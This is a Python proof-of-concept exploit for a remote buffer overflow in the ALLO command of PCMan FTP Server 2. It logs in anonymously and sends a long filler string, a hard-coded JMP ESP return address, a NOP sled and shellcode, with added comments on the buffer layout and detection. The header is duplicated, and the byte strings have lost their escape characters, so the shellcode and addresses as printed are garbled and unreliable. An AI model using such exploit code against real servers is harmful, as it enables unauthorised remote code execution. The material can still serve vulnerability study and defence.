# Vulnerability Title: PCMan FTP Server 2 - 'ALLO' Remote Buffer Overflow
# Discovered by: Nassim Asrir
# Tested on: win7 x32
# Thanks To : Chagi-Lagi - MY.Neggaoui
# Vulnerability Title: PCMan FTP Server 2 - 'ALLO' Remote Buffer Overflow
# Discovered by: Nassim Asrir
# Tested on: win7 x32
# Thanks To : Chagi-Lagi - MY.Neggaoui
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
import socket

# Proof-of-concept for the 'ALLO' overflow named in the header: after an
# anonymous FTP login it sends one ALLO command whose argument is far longer
# than the server expects. From a defensive standpoint the observable
# signature is an ALLO argument of several kilobytes arriving right after an
# anonymous USER/PASS exchange. The login used here is anonymous with an empty
# password (see the USER/PASS lines below), so disabling anonymous access
# removes the precondition this script relies on.
#
# NOTE(review): every string literal in this file appears to have lost its
# backslash escape prefixes in transcription ("xf7" rather than a byte
# escape), so as printed the values are plain ASCII text, not the bytes the
# comments describe; the trailing spaces on the USER/PASS/ALLO lines are
# presumably where the line-terminator escapes stood. The lengths and offsets
# documented below are read as the author intended them.

ret = "xf7xf8xc5x75" #@ JMP ESP Kernel32.dll
# Fixed return address that the author reports as a JMP ESP gadget in
# kernel32.dll on the tested host (win7 x32, per the header). A hard-coded
# address only works when that module loads at the same base; this is the
# kind of assumption address-space randomisation is meant to break.

# Payload placed after the return address. The variable name suggests a
# calculator-launching test payload, but nothing on the page confirms what
# these bytes do — treat it as opaque.
calc =("xddxc5xd9x74x24xf4x5ax31xc9xb8xd1x96xc1xcbxb1"
"x33x31x42x17x83xc2x04x03x93x85x23x3exefx42x2a"
"xc1x0fx93x4dx4bxeaxa2x5fx2fx7fx96x6fx3bx2dx1b"
"x1bx69xc5xa8x69xa6xeax19xc7x90xc5x9axe9x1cx89"
"x59x6bxe1xd3x8dx4bxd8x1cxc0x8ax1dx40x2bxdexf6"
"x0fx9excfx73x4dx23xf1x53xdax1bx89xd6x1cxefx23"
"xd8x4cx40x3fx92x74xeax67x03x85x3fx74x7fxccx34"
"x4fx0bxcfx9cx81xf4xfexe0x4excbxcfxecx8fx0bxf7"
"x0exfax67x04xb2xfdxb3x77x68x8bx21xdfxfbx2bx82"
"xdex28xadx41xecx85xb9x0exf0x18x6dx25x0cx90x90"
"xeax85xe2xb6x2excexb1xd7x77xaax14xe7x68x12xc8"
"x4dxe2xb0x1dxf7xa9xdexe0x75xd4xa7xe3x85xd7x87"
"x8bxb4x5cx48xcbx48xb7x2dx23x03x9ax07xacxcax4e"
"x1axb1xecxa4x58xccx6ex4dx20x2bx6ex24x25x77x28"
"xd4x57xe8xddxdaxc4x09xf4xb8x8bx99x94x10x2ex1a"
"x3ex6d")

# Overflow buffer layout as the author intended it: 2007 bytes of filler up to
# the saved return address, the 4-byte `ret` value, a 40-byte run of 0x90, then
# the payload. (As printed, 'x41' is a three-character literal, so the
# repetition yields 6021 characters — another symptom of the missing escapes.)
buffer1= 'x41' * 2007 + ret + "x90" * 40 + calc

print "Sending..."  # Python 2 print statement, matching the python2.7 shebang

# Plain-text FTP session against a hard-coded lab address on port 21. No
# timeout is set and no exception is handled, so a refused or hung connection
# stops the script with a traceback. `connect` receives None (socket.connect
# returns nothing) and is never used.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.108.129',21))
s.recv(1024)  # server banner; every reply is discarded, so no FTP response code is ever checked
s.send('USER anonymous ')  # anonymous login
s.recv(1024)
s.send('PASS ')  # empty password
s.recv(1024)
s.send('ALLO' + buffer1 + ' ')  # the oversized ALLO argument is the trigger
s.close()